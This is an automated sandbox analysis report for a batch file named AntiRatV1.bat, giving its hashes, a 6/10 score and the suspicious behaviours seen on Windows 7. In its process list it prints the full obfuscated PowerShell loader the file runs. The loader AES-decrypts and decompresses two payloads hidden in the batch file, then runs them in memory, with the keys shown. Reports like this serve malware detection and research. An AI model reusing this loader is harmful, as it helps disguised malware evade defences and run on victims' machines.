Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
28/09/2024, 13:40
Static task
static1
Behavioral task
behavioral1
Sample
AntiRatV1.bat
Resource
win7-20240729-en
4 signatures
150 seconds
General
-
Target
AntiRatV1.bat
-
Size
10.5MB
-
MD5
ea1315beaae801fd48de7f359a6f9411
-
SHA1
a565aee47aa42bd87dafea38d6090447df6d822c
-
SHA256
0c55bb4d572eb35093da11086643bcf6c04a1b7653de40e5e289df61b96f0c16
-
SHA512
1616cad5cff6a75306db6479f98df4bf78084c0596983a9e46cedffed447ab0028a839604d3dd931603e535e455b52688a942e98582ba1751d1d13611ffbe00f
-
SSDEEP
49152:RCRYnt0My3KYMfNIBZ9pCm4+DwXGPOXFTqKZp239XT48jmRjrd7dU52F65QV9Qp2:9
Score
6/10
Malware Config
Signatures
-
pid Process 2692 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2692 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2692 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1792 wrote to memory of 2692 1792 cmd.exe 31 PID 1792 wrote to memory of 2692 1792 cmd.exe 31 PID 1792 wrote to memory of 2692 1792 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\AntiRatV1.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0dtIkrFE6oNEPpxGwNC90NeqI8xHQE5kI3kv5xoh2sg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fp0pgBxNQH3MU7vN1DWl2g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $jeCvp=New-Object System.IO.MemoryStream(,$param_var); $uxoVp=New-Object System.IO.MemoryStream; $BPDJh=New-Object System.IO.Compression.GZipStream($jeCvp, [IO.Compression.CompressionMode]::Decompress); $BPDJh.CopyTo($uxoVp); $BPDJh.Dispose(); $jeCvp.Dispose(); $uxoVp.Dispose(); $uxoVp.ToArray();}function execute_function($param_var,$param2_var){ $jNWGO=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $QnOct=$jNWGO.EntryPoint; $QnOct.Invoke($null, $param2_var);}$zkWSq = 'C:\Users\Admin\AppData\Local\Temp\AntiRatV1.bat';$host.UI.RawUI.WindowTitle = $zkWSq;$wWXvv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($zkWSq).Split([Environment]::NewLine);foreach ($QqnyZ in $wWXvv) { if ($QqnyZ.StartsWith(':: ')) { $OxnGt=$QqnyZ.Substring(3); break; }}$payloads_var=[string[]]$OxnGt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2692
-